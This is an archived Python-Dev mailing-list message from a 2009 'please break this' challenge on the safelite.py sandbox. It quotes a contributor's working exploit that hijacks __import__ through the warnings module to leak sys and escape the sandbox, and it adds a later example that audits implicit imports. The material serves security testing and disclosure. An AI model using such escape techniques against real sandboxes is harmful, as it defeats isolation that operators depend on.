[Python-Dev] Challenge: Please break this! [Now with blog post]

tav tav at espians.com
Tue Feb 24 09:27:01 CET 2009


Daniel emailed in the exploit below and it is pretty devastating. It takes advantage of the fact that the warnings framework in 2.6+ dynamically imports modules without being explicitly called!!

I've fixed this hole in safelite.py, but would be interested to know if there are other non-user-initiated dynamically imported modules?

Thanks Daniel for bringing this to our attention!

On Tue, Feb 24, 2009 at 4:46 AM, Daniel (ajax) Diniz <ajaksu at gmail.com> wrote:

Here's my attempt. Uses the builtin warnings module. You might need to change 'args[1]' to 'args[2]' depending on your environment.

I really don't like to post these to public MLs, but feel free to do so if you think no harm may arise from this one ;)

Daniel

----

from safelite import FileReader

# Let's build a fake module
warnings = __builtins__.__class__('warnings')

# Fill it with deception
warnings.defaultaction = "ignore"

# And provide a supporting thug
def __import__(*args):
    try:
        print "How nice:\n", args[1].keys()
        global sys
        sys = args[1]['sys']
    except Exception, v:
        print "Exception:", v
    return warnings

# Put the bogus module at the doorstep...
__builtins__.warnings = warnings

# and have the thug replacing the doorman
__builtins__.__import__ = __import__

# An unsuspecting customer passes by...
FileReader('safelite.py').seek(1.1)

# ... and is brutally mugged :)
print sys
print dir(sys)

-- love, tav

plex:espians/tav | tav at espians.com | +44 (0) 7809 569 369 http://tav.espians.com | http://twitter.com/tav | skype:tavespian
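The question above, whether trusted code performs other imports that the user never asked for, can be checked empirically. The following is an added example, not part of the original messages or of safelite.py, and is written for Python 3 rather than the 2.6 of the thread: it records every call that reaches builtins.__import__ while a callable runs, together with the name of the module whose globals were passed along. record_imports, implicit_imports and constructed_seek are hypothetical names, and constructed_seek is a constructed stand-in for library code with a lazy import.

```python
import builtins
import contextlib


@contextlib.contextmanager
def record_imports():
    """Log every call that reaches builtins.__import__ while the block runs."""
    calls = []
    real_import = builtins.__import__

    def recorder(name, globals=None, locals=None, fromlist=(), level=0):
        # 'globals' is the importing module's namespace, i.e. the args[1]
        # that the replaced __import__ in the quoted message received.
        importer = (globals or {}).get("__name__", "<unknown>")
        calls.append((name, importer))
        return real_import(name, globals, locals, fromlist, level)

    builtins.__import__ = recorder
    try:
        yield calls
    finally:
        builtins.__import__ = real_import  # always restore the real importer


def implicit_imports(func, allowed=()):
    """Run func; return sorted (module, importer) pairs not in 'allowed'."""
    with record_imports() as calls:
        func()
    return sorted({c for c in calls if c[0] not in allowed})


# Constructed stand-in for trusted code that imports lazily on a rare path,
# as the 2.6 warnings machinery did when seek() was given a float.
def constructed_seek(pos):
    if isinstance(pos, float):
        import warnings  # hidden import, reached only for float input
        with warnings.catch_warnings():
            warnings.simplefilter("ignore")
            warnings.warn("integer argument expected", DeprecationWarning)
    return int(pos)


if __name__ == "__main__":
    print(implicit_imports(lambda: constructed_seek(1)))    # common path
    print(implicit_imports(lambda: constructed_seek(1.1)))  # rare path
```

Each pair reported for the rare path names a module whose namespace would be handed to whatever __import__ is installed at that moment, so these are the call sites a sandbox has to cover.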


